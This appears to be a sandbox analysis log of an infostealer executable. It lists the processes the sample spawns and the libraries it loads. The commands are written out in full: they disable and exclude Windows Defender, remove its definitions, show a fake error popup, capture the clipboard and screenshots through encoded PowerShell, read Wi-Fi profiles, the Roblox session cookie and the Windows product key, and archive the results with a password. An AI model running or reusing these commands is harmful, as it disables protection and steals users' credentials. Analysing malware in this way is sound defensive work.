Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "start bound.exe"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('couldn\x22t run, poor connection try again later.', 0, 'Connection Fail', 0+16);close()""	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" *"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('couldn\x22t run, poor connection try again later.', 0, 'Connection Fail', 0+16);close()""	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\bound.exe bound.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('couldn\x22t run, poor connection try again later.', 0, 'Connection Fail', 0+16);close()"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.trksyln.net/tgmacro/download
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.cmdline"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1896,i,17984460610350237661,2584867532713279060,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD934.tmp" "c:\Users\user\AppData\Local\Temp\4mvljvuo\CSC4C1DA82D2D044571BEF9081AA72717.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: python3.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: libffi-8.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: sqlite3.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: libcrypto-3.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: libssl-3.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: ksuser.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: avrt.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: midimap.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
